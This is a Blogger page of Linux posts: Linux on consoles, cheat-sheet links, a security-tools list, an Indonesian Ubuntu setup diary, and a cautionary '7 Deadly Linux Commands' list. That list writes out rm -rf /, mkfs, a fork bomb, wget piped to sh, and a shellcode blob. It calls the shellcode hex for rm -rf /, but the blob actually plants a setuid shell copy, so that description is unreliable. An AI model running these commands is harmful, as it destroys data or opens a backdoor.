Thursday, March 1, 2012

5 Most Popular Linux Hackable Gadget

Linux is a powerful and versatile operating system that can be utilized to hack just about any electronic hardware device. To prove it, I have here a list of popular gadgets that are already known to run Linux.


1. Nintendo DS

DSLinux, a port of the Linux operating system, made it possible to install Linux on Nintendo DS. DSLinux runs a modified µClinux kernel. It is currently based on uCLinux 2.6.14 (Linux-2.6.14-hsc0). It only runs in textmode and nano-x which is displayed via a custom framebuffer console driver. Input is done via a keyboard displayed on the touchscreen of the Nintendo DS. DSLinux has no package management facilities. Instead, DSLinux builds are distributed as a single tar archive.

With the exception of the microphone, all hardware inside the Nintendo DS, including the wireless is supported by DSLinux. The Nintendo DS firmware can be read from /dev/firmware, but write support is left out for safety reasons.


2. Apple iPod

iPod, everybody’s favorite music player can be installed with Linux. A µClinux-based Linux distribution called iPodLinux is able to run on several iPod models. When the iPodLinux kernel is booted it takes the place of Apple's iPod operating system and automatically loads Podzilla, an alternative GUI and launcher for a number of additional included programs such as a video player, an image viewer, a command line shell, games, emulators for video game consoles, Computer programming demos, and other experimental or occasionally unfinished Computer software.

Here are some of Podzilla’s features:
* An iPod-like user interface
* Video playback with sound
* Support for AAC, MP3 and basic OGG playback (4G & 5G Music Player Daemon is multifunctional, but can be fixed)
* Many games, including TuxChess, Bluecube (Tetris clone), Chopper, StepMania (a Dance Dance Revolution clone) and more
* Recording through audio jack at much higher quality than Apple's firmware
* Ability to play the games Doom and Doom II (and presumably any Doom Total Conversion; Chex Quest for instance)
* Ability to run many emulators, such as iBoy (Nintendo Game Boy Emulator), iNES (Nintendo Entertainment System Emulator), iDarcNES (port of the multiple system emulator DarcNES), iMAME (port of Multiple Arcade Machine Emulator), and iGPSP (Game Boy Advance emulator)


If you are interested in installing Linux on your iPod (5th Generation Video iPod), perhaps this will help: 13 Not-So-Easy Steps to Install Linux on iPod

3. Microsoft Xbox

Xbox Linux is a project that ported the Linux computer operating system to the Microsoft Xbox. There is also a newer project for the Xbox 360, Free60. Because the Xbox uses a digital signature system to prevent the public from running unsigned code, one must either use a modchip, or find an alternative system for running unsigned code. Since the Xbox is essentially just a PC, with a custom processor, a hard drive, RAM, and 4 USB ports, it is capable to run several readily available Linux distributions smoothly. "Xebian", an Xbox compatible version of Debian, and Gentoox, a similarly customized version of Gentoo are known to run successfully on Xbox.

An Xbox with Linux can be a full desktop computer with mouse and keyboard, a web/email box connected to a TV, a server, router or a node in a cluster. One can either dual-boot or use Linux only; in the latter case, one can replace both IDE devices. One can also connect the Xbox to a VGA monitor. A converter may be needed to use keyboards/mice in the controller ports, however this is fairly easy to achieve because the Xbox uses the standard USB bus.


4. Nintendo GameCube

Nintendo GameCube Linux is a project to port Linux to the Nintendo GameCube (and now the Wii) in the same manner as Xbox Linux. The GameCube was seen to be a less attractive system to port Linux to since it not only lacked an on-board Ethernet port and internal hard drive, but also an optical drive natively capable of reading DVDs.

Nintendo GameCube Linux also recognizes SD Cards and Multimedia Cards and is able to use them normally, given the appropriate adaptor.


5. Sony PlayStation

Linux for PlayStation 2, a kit released by Sony Computer Entertainment in 2002, allows the PlayStation 2 console to be used as a personal computer. It included a Linux-based operating system, a USB keyboard and mouse, a VGA adapter, a PS2 network adaptor (Ethernet only), and a 40 GB hard disk drive (HDD). The PS2 Linux distribution is based on Kondara MNU/Linux, a Japanese distribution itself based on Red Hat Linux. PS2 Linux is similar to Red Hat Linux 6, and has most of the features one might expect in a Red Hat Linux 6 system.

The Linux Kit turns the PlayStation 2 into a full-fledged computer system, but it does not allow for use of the DVD-ROM drive except to read PS1 and PS2 discs due to piracy concerns by Sony. Noted open source software that compiles on the kit includes Mozilla Suite, X-Chat, and Gaim. Light-weight applications better suited to the PS2's 32MB of RAM include xv, Dillo, Ted, and AbiWord. The default window manager is Window Maker, but it is possible to install and use Fluxbox and FVWM.

Linux for PlayStation 2 Kit

The PlayStation 3 is also capable of running Linux. Many distributions are compatible with the console. Debian, Fedora 8, Gentoo, OpenSuSE and Ubuntu can be run on the PlayStation 3. Yellow Dog Linux for the PlayStation 3 was first released for the PS3 in late 2006.

Yellow Dog Linux on PS 3


Categories: , ,

10 Essential UNIX/Linux Command Cheat Sheets

Linux has become so idiot proof nowadays that there is less and less need to use the command line. However, the commands and shell scripts have remained powerful for advanced users to utilize to help them do complicated tasks quickly and efficiently.

To those of you who are aspiring to become a UNIX/Linux guru, you have to know loads of commands and learn how to effectively use them. But there is really no need to memorize everything since there are plenty of cheat sheets available on the web and on books. To spare you from the hassles of searching, I have here a collection of 10 essential UNIX/Linux cheat sheets that can greatly help you on your quest for mastery:


UNIX Tutorial for Beginners
This is a quick and easy UNIX/Linux tutorial page that is aimed at beginners. It gives a subtle introduction to some of the most important UNIX/Linux commands.



Learning the Shell
Aside from showing you how to apply the most basic UNIX/Linux commands, “Learning the Shell’ will teach you the utmost importance of using the command line.



Learn UNIX in 10 Minutes
From the page: This is something that I had given out to students (CAD user training) in years past. The purpose was to have on one page the basics commands for getting started using the UNIX shell (so that they didn't call me asking what to do the first time someone gave them a tape).



FOSSwire Unix/Linux Command Cheat Sheet
A one page UNIX/Linux command reference that you can download in PDF format. You can easily print it, and then paste it on your wall.

UNIX Toolbox
From the page: This document is a collection of Unix/Linux/BSD commands and tasks which are useful for IT work or for advanced users. This is a practical guide with concise explanations; however the reader is supposed to know what s/he is doing.


Practical Linux Command Line Reference
This is another handy one-page cheat sheet for common command line operations. All of the commands have been tested on Fedora and Ubuntu.


How to Look Like a UNIX Guru
From the page: This lecture takes you through the basic commands and then shows you how to combine them in simple patterns or idioms to provide sophisticated functionality like histogramming. This lecture assumes you know what a shell is and that you have some basic familiarity with UNIX.



A Directory of Linux Commands (in alphabetical order)
From the O'reilly book “Linux in a Nutshell, 5th Edition”, it features an alphabetical list of 687 commands and a short description on each one of them.

Linux Security Quick Reference Guide
This quick reference guide (in PDF) will serve as your aid on improving the security of your Linux system. It provides some pointers to more in-depth security information that could help you become a good UNIX/Linux system administrator.


Bash Programming Cheat Sheet
From the page: A quick cheat sheet for programmers who want to do shell scripting. This is not intended to teach programming, etc. but it is intended for someone who knows one programming language to begin learning about bash scripting.

Categories: , ,

The 7 Deadly Linux Commands

If you are new to Linux, chances are you will meet a stupid person perhaps in a forum or chat room that can trick you into using commands that will harm your files or even your entire operating system. To avoid this dangerous scenario from happening, I have here a list of deadly Linux commands that you should avoid.

1. Code:
rm -rf /
This command will recursively and forcefully delete all the files inside the root directory.

2. Code:
char esp[] __attribute__ ((section(".text"))) /* e.s.p
release */
= "\xeb\x3e\x5b\x31\xc0\x50\x54\x5a\x83\xec\x64\x68"
"\xff\xff\xff\xff\x68\xdf\xd0\xdf\xd9\x68\x8d\x99"
"\xdf\x81\x68\x8d\x92\xdf\xd2\x54\x5e\xf7\x16\xf7"
"\x56\x04\xf7\x56\x08\xf7\x56\x0c\x83\xc4\x74\x56"
"\x8d\x73\x08\x56\x53\x54\x59\xb0\x0b\xcd\x80\x31"
"\xc0\x40\xeb\xf9\xe8\xbd\xff\xff\xff\x2f\x62\x69"
"\x6e\x2f\x73\x68\x00\x2d\x63\x00"
"cp -p /bin/sh /tmp/.beyond; chmod 4755
/tmp/.beyond;";


This is the hex version of [rm -rf /] that can deceive even the rather experienced Linux users.

3. Code:
mkfs.ext3 /dev/sda

This will reformat or wipeout all the files of the device that is mentioned after the mkfs command.

4. Code:
:(){:|:&};:

Known as forkbomb, this command will tell your system to execute a huge number of processes until the system freezes. This can often lead to corruption of data.

5. Code:
any_command > /dev/sda

With this command, raw data will be written to a block device that can usually clobber the filesystem resulting in total loss of data.

6. Code:
wget http://some_untrusted_source -O- | sh

Never download from untrusted sources, and then execute the possibly malicious codes that they are giving you.

7. Code:
mv /home/yourhomedirectory/* /dev/null

This command will move all the files inside your home directory to a place that doesn't exist; hence you will never ever see those files again.

There are of course other equally deadly Linux commands that I fail to include here, so if you have something to add, please share it with us via comment.

source : The 7 Deadly Linux Commands

Categories: , ,

Best Security Software Tools for Linux

source : http://www.junauza.com/2008/07/10-best-hacking-and-security-software.html

Linux is a hacker’s dream computer operating system. It supports tons of tools and utilities for cracking passwords, scanning network vulnerabilities, and detecting possible intrusions. I have here a collection of 10 of the best security software tools for Linux. Please always keep in mind that these tools are not meant to harm, but to protect.


1. John the Ripper


John the Ripper is a free password cracking software tool initially developed for the UNIX operating system. It is one of the most popular password testing/breaking programs as it combines a number of password crackers into one package, autodetects password hash types, and includes a customizable cracker. It can be run against various encrypted password formats including several crypt password hash types most commonly found on various Unix flavors (based on DES, MD5, or Blowfish), Kerberos AFS, and Windows NT/2000/XP/2003 LM hash. Additional modules have extended its ability to include MD4-based password hashes and passwords stored in LDAP, MySQL and others.


2. Nmap

Nmap is my favorite network security scanner. It is used to discover computers and services on a computer network, thus creating a "map" of the network. Just like many simple port scanners, Nmap is capable of discovering passive services on a network despite the fact that such services aren't advertising themselves with a service discovery protocol. In addition Nmap may be able to determine various details about the remote computers. These include operating system, device type, uptime, software product used to run a service, exact version number of that product, presence of some firewall techniques and, on a local area network, even vendor of the remote network card.

Nmap runs on Linux, Microsoft Windows, Solaris, and BSD (including Mac OS X), and also on AmigaOS. Linux is the most popular nmap platform and Windows the second most popular.


3. Nessus

Nessus is a comprehensive vulnerability scanning software. Its goal is to detect potential vulnerabilities on the tested systems such as:

-Vulnerabilities that allow a remote cracker to control or access sensitive data on a system.
-Misconfiguration (e.g. open mail relay, missing patches, etc).
-Default passwords, a few common passwords, and blank/absent passwords on some system accounts. Nessus can also call Hydra (an external tool) to launch a dictionary attack.
-Denials of service against the TCP/IP stack by using mangled packets

Nessus is the world's most popular vulnerability scanner, estimated to be used by over 75,000 organizations worldwide. It took first place in the 2000, 2003, and 2006 security tools survey from SecTools.Org.


4. chkrootkit

chkrootkit (Check Rootkit) is a common Unix-based program intended to help system administrators check their system for known rootkits. It is a shell script using common UNIX/Linux tools like the strings and grep commands to search core system programs for signatures and for comparing a traversal of the /proc filesystem with the output of the ps (process status) command to look for discrepancies.

It can be used from a "rescue disc" (typically a Live CD) or it can optionally use an alternative directory from which to run all of its own commands. These techniques allow chkrootkit to trust the commands upon which it depend a bit more.

There are inherent limitations to the reliability of any program that attempts to detect compromises (such as rootkits and computer viruses). Newer rootkits may specifically attempt to detect and compromise copies of the chkrootkit programs or take other measures to evade detection by them.


5. Wireshark

Wireshark is a free packet sniffer computer application used for network troubleshooting, analysis, software and communications protocol development, and education. In June 2006, the project was renamed from Ethereal due to trademark issues.

The functionality Wireshark provides is very similar to tcpdump, but it has a GUI front-end, and many more information sorting and filtering options. It allows the user to see all traffic being passed over the network (usually an Ethernet network but support is being added for others) by putting the network interface into promiscuous mode.

Wireshark uses the cross-platform GTK+ widget toolkit, and is cross-platform, running on various computer operating systems including Linux, Mac OS X, and Microsoft Windows. Released under the terms of the GNU General Public License, Wireshark is free software.


6. netcat

netcat is a computer networking utility for reading from and writing to network connections on either TCP or UDP.

Netcat was voted the second most useful network security tool in a 2000 poll conducted by insecure.org on the nmap users mailing list. In 2003, it gained fourth place, a position it also held in the 2006 poll.

The original version of netcat is a UNIX program. Its author is known as *Hobbit*. He released version 1.1 in March of 1996.

Netcat is fully POSIX compatible and there exist several implementations, including a rewrite from scratch known as GNU netcat.


7. Kismet

Kismet is a network detector, packet sniffer, and intrusion detection system for 802.11 wireless LANs. Kismet will work with any wireless card which supports raw monitoring mode, and can sniff 802.11a, 802.11b and 802.11g traffic.

Kismet is unlike most other wireless network detectors in that it works passively. This means that without sending any loggable packets, it is able to detect the presence of both wireless access points and wireless clients, and associate them with each other.

Kismet also includes basic wireless IDS features such as detecting active wireless sniffing programs including NetStumbler, as well as a number of wireless network attacks.


8. hping

hping is a free packet generator and analyzer for the TCP/IP protocol. Hping is one of the de facto tools for security auditing and testing of firewalls and networks, and was used to exploit the idle scan scanning technique (also invented by the hping author), and now implemented in the Nmap Security Scanner. The new version of hping, hping3, is scriptable using the Tcl language and implements an engine for string based, human readable description of TCP/IP packets, so that the programmer can write scripts related to low level TCP/IP packet manipulation and analysis in very short time.

Like most tools used in computer security, hping is useful to both system administrators and crackers (or script kiddies).


9. Snort

Snort is a free and open source Network Intrusion prevention system (NIPS) and network intrusion detection (NIDS) capable of performing packet logging and real-time traffic analysis on IP networks.

Snort performs protocol analysis, content searching/matching, and is commonly used to actively block or passively detect a variety of attacks and probes, such as buffer overflows, stealth port scans, web application attacks, SMB probes, and OS fingerprinting attempts, amongst other features. The software is mostly used for intrusion prevention purposes, by dropping attacks as they are taking place. Snort can be combined with other software such as SnortSnarf, sguil, OSSIM, and the Basic Analysis and Security Engine (BASE) to provide a visual representation of intrusion data. With patches for the Snort source from Bleeding Edge Threats, support for packet stream antivirus scanning with ClamAV and network abnormality with SPADE in network layers 3 and 4 is possible with historical observation.


10. tcpdump

tcpdump is a common computer network debugging tool that runs under the command line. It allows the user to intercept and display TCP/IP and other packets being transmitted or received over a network to which the computer is attached.

In some Unix-like operating systems, a user must have superuser privileges to use tcpdump because the packet capturing mechanisms on those systems require elevated privileges. However, the -Z option may be used to drop privileges to a specific unprivileged user after capturing has been set up. In other Unix-like operating systems, the packet capturing mechanism can be configured to allow non-privileged users to use it; if that is done, superuser privileges are not required.

The user may optionally apply a BPF-based filter to limit the number of packets seen by tcpdump; this renders the output more usable on networks with a high volume of traffic.


11. Ettercap

Ettercap is a console-based network sniffer/interceptor/logger that is capable of intercepting traffic on a network segment, capturing passwords, and conducting active eavesdropping against a number of common protocols. Ettercap supports active and passive dissection of many protocols (including ciphered ones) and provides many features for network and host analysis. Ettercap also has the ability to actively or passively find other poisoners on the LAN.



12. Nikto

Nikto is a web server scanner that is known to perform comprehensive tests against web servers for multiple items, including over 3500 potentially dangerous files/CGIs, versions on over 900 servers, and version specific problems on over 250 servers. It performs generic and server type specific checks. It also captures and prints any cookies received.



13. OpenSSH

OpenSSH is a Free and Open Source version of the SSH connectivity tools providing encrypted communication sessions over a computer network. It encrypts all traffic (including passwords) to effectively eliminate eavesdropping, connection hijacking, and other attacks. Additionally, OpenSSH provides secure tunneling capabilities and several authentication methods, and supports all SSH protocol versions.



14. Aircrack-ng

Aircrack-ng is a wireless tool and password cracker. It is a network software suite consisting of a detector, packet sniffer, WEP and WPA/WPA2-PSK cracker and analysis tool for 802.11 wireless LANs.



15. Tripwire

Tripwire is a security and data integrity tool that is useful for monitoring and alerting on specific file change(s) on a range of systems. Used with system files on a regular basis, Tripwire can notify system administrators of corrupted or tampered files, so damage control measures can be taken in a timely manner.



16. Metasploit Framework

Metasploit Framework is an advanced open-source platform for developing, testing, and using exploit code. The extensible model through which payloads, encoders, no-op generators, and exploits can be integrated has made it possible to use the Metasploit Framework as an outlet for cutting-edge exploitation research. It ships with hundreds of exploits, as you can see in their online exploit-building demo.



17. THC Hydra

THC (The Hacker's Choice) Hydra uses a dictionary attack to test for weak or simple passwords on one or many remote hosts running a variety of different services. It was designed as a proof-of-concept utility to demonstrate the ease of cracking poorly chosen passwords. It can perform rapid dictionary attacks against more then 30 protocols, including telnet, ftp, http, https, smb, several databases, and much more.



18. Dsniff

Dsniff is suite of powerful network auditing and penetration-testing tools and utilities that includes code to parse many different application protocols and extract interesting information. The information that can be obtained from this sniff application are: usernames and passwords, web pages being visited, contents of email, etc.



19. RainbowCrack

RainbowCrack is a password hash cracker that makes use of a large-scale time-memory trade-off. It differs from "conventional" brute force crackers in that it uses large pre-computed tables called rainbow tables to reduce the length of time needed to crack a password drastically.



20. rkhunter

rkhunter scans for rootkits, backdoors and possible local exploits. It does this by comparing SHA-1 hashes of important files with known good ones in online database, searching for default directories (of rootkits), wrong permissions, hidden files, suspicious strings in kernel modules, and special tests for Linux and FreeBSD.

Categories: , , ,

Otak-atik Ubuntu 11.04

Berawal dari setting VGA SiS itu, saya jadi terarik otak-atik si Ubuntu, sesuai dengan niatan juga untuk pindah framework pemrograman Eclipse saya ke Ubuntu, biar lebih terasa lagi opensourcenya.
Karena tujuan awal memindahkan si Eclipse, saya mulai dari download Eclipse. Pada akhirnya saya butuh paling tidak Eclipse ME untuk aplikasi J2ME saya dan Eclipse ADT untuk Android.
Seperti di Jendela, Eclipse ME juga perlu mendownload pluginnya dulu, saya download lewat interface Install New Software dari Eclipse. Setelah itu setting Wireless Toolkit dan sudah langsung jadi. Wireless Toolkit untuk Jendela dan Linux jelas beda, jadi saya harus download ulang. Dengan koneksi seadanya ini memang jadi agak susah, tapi akhirnya berhasil juga.
Untuk ADT, sudah ada step by stepnya di web Android Developer yang resmi. Tinggal download-download dan mengikuti saja. Lumayan juga waktunya untuk download karena semuanya harus online instalasinya, sementara koneksi saya sedang kurang bagus. Yang dapat diinstal offline adalah Android SDK dan ADT Pluginnya. Untuk Virtual Machine dan lain-lain harus dari web langsung.
Sebenarnya langkah ini membutuhkan waktu seharian, tapi yang jelas sebenarnya langkahnya mudah, tapi karena koneksi internet saya kurang bagus jadi terasa merepotkan.
Selain itu saya juga semakin tertarik mengutak-atik si Ubuntu setelah melihat tampilan interface Desktop barunya, Unity. Sangat menarik dan simple, karena saya tidak memiliki dukunga 3d jadi saya menginstall Unity yang 2D dan hasilnya cukup bagus. Saya rasa fungsionalitas interfacenya sangat bagus dengan learning curve yang tidak akan terlalu panjang karena bentuknya sangat user friendly dan OK.

Saya lanjut juga dengan membenahi fitur multimedianya. Pertama install Rhytmbox dan besok saya rencana install XMMS atau Songbird. Setelah itu juga menginstall VLC sebagai player Video utama. Dan tentu saja melengkapi codec multimedia yang diperlukan, semuanya dari Gstreamer dan hanya satu codec yang dari Fluendo(gratis,,,).
Pilih-pilih wallpaper, sebelumnya saya mau cari downloadan wallpaper sebenarnya, tapi ternyata yang default sudah cukup bagus dan saya pilih satu. Gambar kelam yang mengutamakan bokeh.
Cita-cita saya yang lain juga terwujud di Linux ini untuk punya software manajemen e-book yang bagus. Saya menggunakan Calibre. Simpel sekali instalasinya dan penggunaannya juga. Dengan cepat saya sudah memindahkan koleksi e-book saya yang banyak itu ke Library Calibre. Di data otomatis dengan scan folder, sayangnya tag dari buku-buku saya kurang bagus (maklum bajakan dari piratesbay). Saya terpaksa melengkapi satu persatu. Dan ini ternyata justru semakin menunjukkan kehebatan si Calibre, dengan penyesuaian Judul dan Author bisa segera didapat info lengkap tentang buku itu bahkan short reviewnya yang diambil dari GoogleBooks atau isbndb.com. Langsung bisa lengkap semua metadatanya dan bahkan covernya bila ada.
Ada lagi mengenai setting harddisk agar di-mount otomatis saat Ubuntu startup. Dengan software Pysdm, pengaturannya sangat mudah dan saya langsung bisa melakukannya tanpa melalui terminal sama sekali.
Yang istimewa lagi dari Ubuntu 11.04 ini adalah fitur social medianya yang lengkap. Gwibber dan Empathy sangat-sangat memudahkan saya konek ke Facebook, Twitter, YM ataupun Gtalk. Semuanya dengan interface sangat menyenangkan dan simpel khas Ubuntu.
Besok kalau ada waktu rencana mau desktop modding juga sepertinya. Mari kita lihat seniat apa saya besok.

Categories: , ,

Copyright © Johannes Dwi Cahyo | Powered by Blogger

Design by Anders Noren | Blogger Theme by NewBloggerThemes.com | BTheme.net      Up ↑